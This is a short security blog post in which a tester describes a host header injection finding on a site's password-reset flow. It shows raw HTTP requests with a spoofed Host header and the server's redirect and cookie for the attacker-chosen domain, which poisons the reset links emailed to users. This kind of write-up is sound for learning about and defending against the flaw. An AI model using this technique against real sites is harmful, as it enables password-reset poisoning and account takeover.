practical example of host header injection

Let me introduce one of my old finding today before you all.This particular bug was discovered in one of  the private site for which i worked.

Before discussing about the vulnerability let us discuss about some background  necessary for the  attack.



Very often multiple websites are hosted on the same IP address. This is where the Host Header comes in. This header specifies which website should process the HTTP request. The web server uses the value of this header to dispatch the request to the specified website. Each website hosted on the same IP address is called a virtual host.But what happens if we specify an invalid Host Header? If Apache receives an unrecognized Host Header, it passes it to the first virtual host defined in httpd.conf. Therefore, it's possible to send requests with arbitrary Host Headers to the first virtual host.
so the application i penetested let's say (abc.com) was affected with similar kind of vulnerabilty,that why as attacker it was possible for me to send users of siites with fake password reset links ,but links controlled by attacker.

when a user of site goes for password reset procedure the site present this page to the users screenshot below
 
Password reset procedure goes like this.
GET /?743&user_email=victimemail@gmail.com&flag=2 HTTP/1.1
Host: www.abc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: abc.com
Cookie: redacted
Connection: keep-alive

You could see the highlighted Host header value (abc.com which is a valid request from the site )


let us spoof our header(with same with google(take for example attacker controlled domain) and process the request:-
 
 
GET /?743&user_email=victimemail@gmail.com&flag=2 HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: abc.com
Cookie:redacted
Connection: keep-alive


Now see the response for spoofed request

HTTP/1.1 302 Found
Date:xxxxx
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: uclid=0; path=/; domain=.google.com
Location: http://google.com/?743&user_email=victimemail@gmail.com&flag=6&user_type=0
Vary: Accept-Encoding
Content-Length: 37317
Keep-Alive: timeout=2, max=400
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

and now see the screenshot of victim email ,which shows the password reset link with domain controlled by attacker


 



SHARE
  • Image
  • Image
  • Image
  • Image
  • Image
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment